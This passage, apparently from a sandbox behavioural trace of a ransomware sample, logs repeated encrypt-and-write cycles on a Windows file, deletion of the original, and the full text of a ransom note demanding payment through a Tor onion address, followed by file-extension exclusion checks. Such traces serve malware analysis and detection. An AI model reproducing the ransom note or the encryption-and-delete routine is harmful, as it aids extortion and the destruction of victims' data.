lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.316] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.316] GetLastError () returned 0x0 [0148.316] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.316] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.316] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.317] GetLastError () returned 0x0 [0148.317] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.317] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.317] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.317] GetLastError () returned 0x0 [0148.317] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.317] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.317] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.317] GetLastError () returned 0x0 [0148.317] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.317] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.317] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.317] GetLastError () returned 0x0 [0148.317] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.317] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.317] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.317] GetLastError () returned 0x0 [0148.317] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.317] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.317] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.317] GetLastError () returned 0x0 [0148.317] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.317] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.318] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.318] GetLastError () returned 0x0 [0148.318] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.318] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.318] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.318] GetLastError () returned 0x0 [0148.318] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.318] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.318] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.318] GetLastError () returned 0x0 [0148.318] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.318] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.318] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.318] GetLastError () returned 0x0 [0148.318] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.318] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.318] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.318] GetLastError () returned 0x0 [0148.318] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.318] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.318] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.318] GetLastError () returned 0x0 [0148.318] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.318] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.318] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.319] GetLastError () returned 0x0 [0148.319] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.319] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.319] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.319] GetLastError () returned 0x0 [0148.319] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.319] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.319] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.319] GetLastError () returned 0x0 [0148.319] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.319] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.319] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.319] GetLastError () returned 0x0 [0148.319] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.319] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.319] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.319] GetLastError () returned 0x0 [0148.319] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.319] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.319] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.319] GetLastError () returned 0x0 [0148.319] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.319] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.319] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.319] GetLastError () returned 0x0 [0148.319] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.320] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.320] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.320] GetLastError () returned 0x0 [0148.320] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.320] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.320] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.320] GetLastError () returned 0x0 [0148.320] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.320] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.320] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.320] GetLastError () returned 0x0 [0148.320] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.320] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.320] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0148.320] GetLastError () returned 0x0 [0148.320] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0148.320] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0148.320] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0148.320] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui")) returned 0x20 [0148.321] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0148.321] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 1 [0148.321] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui")) returned 0 [0148.321] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui" [0148.321] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ") returned 1 [0148.321] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\.xXB65E.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\.xxb65e.tmp")) returned 0xb65e [0148.322] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\.xXB65E.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\.xxb65e.tmp"), dwFlags=0x1) returned 0 [0148.322] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\.xXB65E.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\.xxb65e.tmp")) returned 1 [0148.322] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0148.322] wcslen (_String="OK") returned 0x2 [0148.322] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.322] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.322] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0148.322] CryptDestroyHash (hHash=0x9ad278) returned 1 [0148.322] CryptReleaseContext (hProv=0x8e3660, dwFlags=0x0) returned 1 [0148.322] FindNextFileW (in: hFindFile=0x9ad338, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0148.322] GetLastError () returned 0x12 [0148.322] FindClose (in: hFindFile=0x9ad338 | out: hFindFile=0x9ad338) returned 1 [0148.323] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0148.323] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0148.323] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0148.324] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0148.324] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.324] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.324] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0148.324] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.324] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*.exe") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*.dll") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*.lnk") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*.bat") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*.ini") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*.msi") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*.scf") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*pagefile.sys*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", 